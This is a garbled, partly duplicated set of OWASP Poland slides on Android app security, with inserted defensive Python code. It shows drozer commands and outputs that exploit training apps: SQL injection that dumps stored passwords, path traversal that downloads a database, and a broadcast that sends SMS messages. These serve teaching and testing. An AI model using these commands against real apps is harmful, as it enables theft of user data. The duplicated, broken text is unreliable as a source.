- User-granted permissions to restrict access to system features and user data
- Application-defined permissions to control application data on a per-app basis
Thank you
Any questions?
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
- Passwords
- Authentication tokens
- Contacts
- Communication records
- IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
- How sensitive data is stored
  - Isolation
  - Privilege separation
- How sensitive data is transmitted
  - Extra-device communication
  - Inter-application communication
  - Inter-component communication
Android Application Components
(diagram: Activities, Services, Content providers, Broadcast receivers)
Android Application Components
AndroidManifest.xml defines how the app works and what kind of interaction between the components and the outer world is possible. Permissions are set there too.
- Activities – <activity>
- Services – <service>
- Content providers – <provider>
- Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
- Permissions:
    <uses-permission android:name="string" />
    <permission android:protectionLevel="…" />
- Components and their attributes
(screenshot: AndroidManifest.xml)
Android Manifest
Protection levels:
- dangerous – increased risk (directly affects users)
- normal – minimal risk (default value)
- signature – same certificate
- signatureOrSystem – same certificate || app in the Android system image
Android Manifest
Example component attributes (apply to Activities, Services, Content providers and Broadcast receivers):
- debuggable
- enabled
- exported
- permission
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested action/data.
    Intent intent = new Intent(Intent.ACTION_VIEW);
    intent.setData(Uri.parse("http://www.google.com"));
    String pack = "com.android.browser";
    ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
    intent.setComponent(comp);
    startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC; the leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
    dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer
Drozer is installed in the default package of AppUse together with adb, so it is enough to just "click-and-play"
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app
Activity components attacks
- If an activity can be triggered by other apps (by an attacker), it can be abused
- By launching it via intents, it's possible to achieve the following:
  - Modify data in the background
  - Trick the user
  - Leak sensitive information
Activity components attacks
- General hijacking scheme (diagram: A sends an Intent meant for B, but E receives it)
- Results of an attack:
  - A malicious Activity could read the data in the Intent and then immediately relay it to the legitimate one
  - Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activity components attacks
- List and launch exported activities:
    dz> run app.activity.info -a com.mwr.example.sieve
    Package: com.mwr.example.sieve
      com.mwr.example.sieve.FileSelectActivity
      com.mwr.example.sieve.MainLoginActivity
      com.mwr.example.sieve.PWList
    dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
Although services generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction (it must be exported, or respond to/accept input from message formats like intents, files or the network stack).
Services attacks
Typical attacks: Denial of Service and Information Leakage
- Find exported services
- Launch them one by one with logcat running to check for sensitive info
- Fire off intents and wait for it
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device
- What info can they hold?
  - User's phone numbers
  - Passwords
  - SMS
- And one of the main problems is, again, permissions:
    dz> run app.provider.info --permission null
Content providers attacks
- Unrestricted access to the app database
  - Just query it: run app.provider.query content://settings/secure
- SQL injection
- Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
    dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
- Unrestricted access to the app database
    dz> run scanner.provider.finduris -a com.mwr.example.sieve
    Accessible content URIs:
      content://com.mwr.example.sieve.DBContentProvider/Keys
      content://com.mwr.example.sieve.DBContentProvider/Passwords
      content://com.mwr.example.sieve.DBContentProvider/Passwords/
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
- SQL injection
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
    unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
    | Password         | pin  |
    | thisismypassword | 9876 |
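Both drozer calls above work because the provider's `query()` pastes the caller's `projection` and `selection` straight into SQL. The following is an added example (not code from the workshop or from Sieve) that reproduces that provider logic against an in-memory SQLite copy of the two tables shown in the output, then shows the hardened version: the projection is checked against an allowlist of column names and the selection may only be `column op ?` terms whose values travel in `selectionArgs`. The `Passwords` rows are constructed; the `Key` row is the one from the slide.

```python
import re
import sqlite3

# Columns a caller may ask for; anything else (including "*") is rejected.
ALLOWED_COLUMNS = ("_id", "service", "username", "password")


def make_db():
    """In-memory copy of the Sieve-style schema from the drozer output (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Key (Password TEXT, pin INTEGER)")
    db.execute("INSERT INTO Key VALUES ('thisismypassword', 9876)")
    db.execute("CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, "
               "username TEXT, password TEXT)")
    db.execute("INSERT INTO Passwords VALUES (1, 'mail', 'alice', 'p@ss1')")
    return db


def vulnerable_query(db, projection, selection, selection_args=()):
    """Mirrors a provider that concatenates the caller's projection and selection.
    --projection "* FROM Key--" turns the statement into SELECT * FROM Key,
    and --selection "'" produces the 'unrecognized token' error seen above."""
    sql = "SELECT " + ", ".join(projection) + " FROM Passwords"
    if selection:
        sql += " WHERE (" + selection + ")"
    return db.execute(sql, selection_args).fetchall()


# Constructed grammar for the hardened selection: `column op ?` joined by AND/OR.
_TERM = r"(?:{cols})\s*(?:=|<>|<|>|LIKE)\s*\?".format(cols="|".join(ALLOWED_COLUMNS))
_SELECTION_RE = re.compile(rf"{_TERM}(?:\s+(?:AND|OR)\s+{_TERM})*", re.IGNORECASE)


def hardened_query(db, projection, selection, selection_args=()):
    """Same interface, but the projection is validated against ALLOWED_COLUMNS and
    the selection must consist of placeholders only, so values cannot carry SQL."""
    for col in projection:
        if col not in ALLOWED_COLUMNS:
            raise ValueError(f"unknown column: {col!r}")
    if selection:
        if not _SELECTION_RE.fullmatch(selection):
            raise ValueError("selection must be of the form `column op ?`")
        if selection.count("?") != len(selection_args):
            raise ValueError("placeholder/argument count mismatch")
    sql = "SELECT " + ", ".join(projection) + " FROM Passwords"
    if selection:
        sql += " WHERE (" + selection + ")"
    return db.execute(sql, selection_args).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_query(db, ["* FROM Key--"], None))
    try:
        hardened_query(db, ["* FROM Key--"], None)
    except ValueError as e:
        print("hardened rejects projection:", e)
    print("hardened:", hardened_query(db, ["username"], "service = ?", ("mail",)))
```

In an Android provider the equivalent is `SQLiteQueryBuilder` with `setProjectionMap` and `setStrict(true)`, plus passing `selectionArgs` through instead of building the string; the allowlist regex here is a stand-in for that, not a general SQL parser.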
Content providers attacks
- Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
    dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
    127.0.0.1 localhost
    dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
    Written 24576 bytes
Content providers demo
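The traversal above works because the provider's `openFile()` hands the URI path to `File` as-is. Confining it is a few lines, shown here as an added example (not code from the workshop or from Sieve): resolve the requested path underneath the provider's export directory, canonicalise it, and refuse anything whose canonical form is not inside that directory. The directory layout in `demo()` is constructed in a temporary folder; the `/etc/hosts` and `../databases/database.db` requests are the two from the slide.

```python
import os
import tempfile


def resolve_within(base_dir, requested):
    """Map a caller-supplied URI path onto a file under base_dir, refusing anything
    that escapes it. Returns the absolute path or raises ValueError."""
    base = os.path.realpath(base_dir)
    # Treat the URI path as relative to the export directory: a leading '/' is
    # dropped, and '..' segments are collapsed by realpath before the check.
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/")))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes export directory: {requested!r}")
    return candidate


def demo():
    """Constructed layout: <tmp>/files/backup.txt may be exported,
    <tmp>/databases/database.db must not be reachable through the provider."""
    root = os.path.realpath(tempfile.mkdtemp())
    export = os.path.join(root, "files")
    os.makedirs(export)
    os.makedirs(os.path.join(root, "databases"))
    with open(os.path.join(export, "backup.txt"), "w") as f:
        f.write("ok")
    with open(os.path.join(root, "databases", "database.db"), "w") as f:
        f.write("secret")

    results = {}
    for req in ("backup.txt", "/backup.txt", "sub/../backup.txt",
                "../databases/database.db", "/etc/hosts"):
        try:
            results[req] = os.path.relpath(resolve_within(export, req), root)
        except ValueError:
            results[req] = "REJECTED"
    return results


if __name__ == "__main__":
    for req, outcome in demo().items():
        print(f"{req!r:30} -> {outcome}")
```

Note that `/etc/hosts` is not rejected but re-rooted to `files/etc/hosts`, which does not exist, so a real `openFile()` would then fail with a file-not-found error rather than serving the system file; only a request that climbs out of the export directory is refused outright.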
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as "battery low", "boot completed", "headset plugged", etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
Broadcast receivers
- If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
- Enumerate receivers
- Determine how the receiver handles the action
- Send an intent and enjoy
Broadcast receivers attacks
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
        <intent-filter>
            <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
        </intent-filter>
    </receiver>
    …
    <uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
    public void onReceive(Context arg0, Intent arg1) {
        context = arg0;
        SmsManager sms = SmsManager.getDefault();
        Bundle bundle = arg1.getExtras();
        sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
        Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
    }
Broadcast receivers attacks
    dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all of the above-mentioned items:
- Setting the android:exported attribute to false (only the user ID of the current app will be able to access the activity)
- Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
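The two defenses above can be checked from the manifest alone, which is the static counterpart of the drozer enumeration used throughout this section. The following added example (not code from the workshop or from GoatDroid) parses a manifest, applies the platform rule that a component with an `<intent-filter>` and no explicit `android:exported` is exported, and reports every reachable component that carries no `android:permission`, plus a debuggable application. The manifest it scans is constructed: it contains the GoatDroid `SendSMSNowReceiver` from the slide above together with hypothetical activity and provider entries so that each rule fires once.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest: the GoatDroid receiver from the slide plus hypothetical
# components (Login, AdminPanel, Settings, ProfileProvider) to exercise each rule.
SAMPLE_MANIFEST = f"""<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="{ANDROID_NS}" package="org.owasp.goatdroid.fourgoats">
  <uses-permission android:name="android.permission.SEND_SMS" />
  <application android:debuggable="true">
    <activity android:name=".activities.Login">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <activity android:name=".activities.AdminPanel" android:exported="true" />
    <activity android:name=".activities.Settings" android:exported="false" />
    <provider android:name=".db.ProfileProvider"
              android:authorities="org.owasp.goatdroid.fourgoats.profile"
              android:exported="true"
              android:permission="org.owasp.goatdroid.fourgoats.READ_PROFILE" />
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

COMPONENT_TAGS = ("activity", "service", "receiver", "provider")


def attr(elem, name):
    """Read an attribute from the android: namespace."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def is_exported(elem):
    """Platform default: an explicit android:exported wins; otherwise a component
    with an <intent-filter> is exported and one without is not."""
    explicit = attr(elem, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    return elem.find("intent-filter") is not None


def audit_manifest(xml_text):
    """Return (component name, issue) pairs for reachable components without a
    permission, i.e. the cases the two general defenses above are meant to close."""
    root = ET.fromstring(xml_text)
    issues = []
    app = root.find("application")
    if app is None:
        return issues
    if (attr(app, "debuggable") or "").lower() == "true":
        issues.append(("<application>", "android:debuggable=true"))
    for comp in app.iter():
        if comp.tag not in COMPONENT_TAGS or not is_exported(comp):
            continue
        actions = [attr(a, "name") for a in comp.iter("action")]
        if "android.intent.action.MAIN" in actions:
            continue  # the launcher activity has to be reachable
        if attr(comp, "permission") is None:
            how = ("implicitly via intent-filter" if attr(comp, "exported") is None
                   else "android:exported=true")
            issues.append((attr(comp, "name") or "?",
                           f"{comp.tag} exported {how} without android:permission"))
    return issues


if __name__ == "__main__":
    for name, issue in audit_manifest(SAMPLE_MANIFEST):
        print(f"{name}: {issue}")
```

The manifest inside an APK is binary AXML; decode it first (apktool, or `aapt dump xmltree`) and feed the text form to `audit_manifest`. A component it reports is exactly one that `app.activity.info`, `app.service.info --permission null` or `app.provider.info --permission null` would list from drozer, so the two views can be cross-checked.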
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via intent/content provider
  – Shared file
  – Server response
  – Third party website
Client side injection – what to inject
• SQL injection to local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. other application, system service, running a new activity, etc.) via special objects called Intents

    Intent viewIntent = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
    Intent captureIntent = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);

Client side injection – how to find
• SQL injections
    dz> run scanner.provider.injection -a <package_name>
• Data path traversal
    dz> run scanner.provider.traversal -a <package_name>
• Intent injections
    dz> run app.package.manifest -a <package_name>
    dz> run app.activity.info -a <package_name>
    dz> run app.service.info --permission null -a <package_name>
    dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm://" prefix allows remote installation of ANY application, while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute "exported=false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged in user to another logged in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  - http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high entropy, tested token generation resources
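The four mitigations above, as an added example that is not part of the original talk: a minimal server-side session registry (the class name, the timeout values and the injectable clock are my assumptions) that issues high-entropy tokens, expires them on idle and absolute timeouts, rotates them when the authentication state changes and lets the server invalidate them outright.

```python
import secrets
import time

IDLE_TIMEOUT = 30 * 60        # seconds; matches the "reuse the cookie after 30 minutes" test above
ABSOLUTE_TIMEOUT = 8 * 3600   # hard cap regardless of activity; tune per application


class SessionStore:
    """Server-side session registry. The client only ever holds an opaque
    random token; everything that matters lives in this table, so the server
    can expire or revoke a session without the client's cooperation."""

    def __init__(self, clock=time.time):
        self._clock = clock            # injectable so expiry can be tested offline
        self._sessions = {}            # token -> {"user", "created", "last_seen"}

    def create(self, user):
        """Issue a fresh 256-bit token from the OS CSPRNG (never a device ID,
        a counter or a hash of the user name, all of which can be guessed)."""
        token = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[token] = {"user": user, "created": now, "last_seen": now}
        return token

    def _expired(self, sess, now):
        return (now - sess["last_seen"] > IDLE_TIMEOUT
                or now - sess["created"] > ABSOLUTE_TIMEOUT)

    def resolve(self, token):
        """Map a presented token to its user, or None. An expired token is
        destroyed the moment it is seen, so it cannot be replayed later."""
        sess = self._sessions.get(token)
        if sess is None:
            return None
        now = self._clock()
        if self._expired(sess, now):
            del self._sessions[token]
            return None
        sess["last_seen"] = now
        return sess["user"]

    def invalidate(self, token):
        """Server-side logout: a token the server has forgotten is worthless."""
        self._sessions.pop(token, None)

    def rotate(self, old_token, user):
        """Call whenever the authentication state changes (login, user switch,
        privilege change): the old token dies and a new one is bound to the new state."""
        self.invalidate(old_token)
        return self.create(user)

    def invalidate_user(self, user):
        """Destroy every session of one user, e.g. after a password change."""
        dead = [t for t, s in self._sessions.items() if s["user"] == user]
        for t in dead:
            del self._sessions[t]
        return len(dead)

    def purge_expired(self):
        """Housekeeping: drop tokens nobody can use any more. Returns the count removed."""
        now = self._clock()
        dead = [t for t, s in self._sessions.items() if self._expired(s, now)]
        for t in dead:
            del self._sessions[t]
        return len(dead)

    def live_count(self):
        return len(self._sessions)


if __name__ == "__main__":
    store = SessionStore()
    tok = store.create("alice")
    print("resolved:", store.resolve(tok))
    new_tok = store.rotate(tok, "bob")
    print("after rotation:", store.resolve(new_tok), "| old token still valid:", store.resolve(tok))
```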
Thank you
pawel.rzepa@outlook.com
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling
  – High Level – Java Code
• Disassembling
  – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows the use of any existing Java decompiler on the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompiler
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar
    java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling – Luyten
Demo: Modify Smali Files
Demo
Core security features to build a secure application
• The Android Application Sandbox
• An application framework with robust implementations of common security functionality such as cryptography, permissions
• An encrypted file system that can be enabled to protect data on lost or stolen devices
• User-granted permissions to restrict access to system features and user data
• Application-defined permissions to control application data on a per-app basis
Thank you
Any questions?
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
  – Isolation
  – Privilege separation
• How sensitive data is transmitted
  – Extra-device communication
  – Inter-application communication
  – Inter-component communication
Android Application Components
[Diagram: the four component types – Activities, Services, Content providers, Broadcast receivers]
Android Application Components
AndroidManifest.xml defines in which way the app works and what kind of interaction between components and the outer world is possible. Permissions are set there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions
    <uses-permission android:name="string" />
    <permission android:protectionLevel="…" />
• Components and their attributes
AndroidManifest.xml
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
• debuggable
• enabled
• exported
• permission
[Diagram: the four component types – Activities, Services, Content providers, Broadcast receivers]
Example components attributes
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested actions/data.

    Intent intent = new Intent(Intent.ACTION_VIEW);
    intent.setData(Uri.parse("http://www.google.com"));
    String pack = "com.android.browser";
    ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
    intent.setComponent(comp);
    startActivity(intent);

Drozer
Open source tool to interact with other applications through IPC - the leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
    dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer
Is installed in the default package of AppUse together with adb, so it's enough to just "click-and-play"
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it with intents it's possible to achieve the following:
  – Modify data in background
  – Tricking the user
  – Leaking sensitive information
Activities
Activity components attacks
• General hijacking scheme
• Results of an attack:
  – A malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
  – Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
[Diagram: general hijacking scheme between components A, B and E]
Activities
Activity components attacks
• List and launch exported activities
    dz> run app.activity.info -a com.mwr.example.sieve
    Package: com.mwr.example.sieve
      com.mwr.example.sieve.FileSelectActivity
      com.mwr.example.sieve.MainLoginActivity
      com.mwr.example.sieve.PWList
    dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services
Services attacks
Although they generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction (it must be exported, or respond to/accept input from message formats like intents, files or the network stack)
Services
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one-by-one with logcat to check for sensitive info
• Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device
Content providers
Content providers
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems is, again, permissions
    run app.provider.info --permission null
Content providers
Content providers attacks
